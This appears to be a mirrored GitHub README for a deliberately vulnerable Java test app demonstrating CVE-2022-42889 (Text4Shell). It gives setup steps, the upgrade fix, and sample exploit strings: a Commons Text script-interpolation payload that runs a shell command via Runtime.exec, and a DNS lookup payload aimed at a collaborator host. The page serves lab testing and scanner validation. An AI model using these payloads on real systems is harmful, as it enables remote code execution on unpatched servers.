Git Product home page Git Product logo

text4shell-poc's Introduction

CVE-2022-42889 PoC Test Application

This is a vulnerable application developed as a Proof of Concept for the vulnerability CVE-2022-42889.

Maven Installation

In order to run this you will need:

  • JDK 17 or above
  • Maven
  1. Clone the git repo
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Maven install to create the JAR
mvn clean install

This will create the ./target folder and within that folder should be the JAR file text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Start the webserver
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

This will start a web server on your localhost listening on port 8080 by default

  1. Browse to the webserver

Access the webserver at http://localhost:8080/ and you should see the following output

Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Exploit manually or perform a scan using text4shell-scan

Sample Exploit Payloads

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}

${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: https://www.urlencoder.org/.

Docker

Alternatively you can use Docker to be able to run this PoC:

  1. Clone the git repo
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker build
docker build --tag=text4shell-poc .
  1. Docker run
docker run -p 80:8080 text4shell-poc
  1. Test the vulnerable app
http://localhost/
  1. Attack can be performed by passing a string โ€œ${prefix:name}โ€ like shown below:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

${dns:<burp collaborator host>)}

Recommended URL encoder for successful exploit demonstration: https://www.urlencoder.org/.

Alternatively you can validate the effectiveness of scanning tools such as text4shell-scan

Are You Vulnerable?

In order for your code to be vulnerable you need to:

The Fix

The fix for this is to update your instances of commons-text to versions 1.10.0 or later.

Author

Bryan Smith

text4shell-poc's People

Contributors

securekomodo avatar bliutech avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.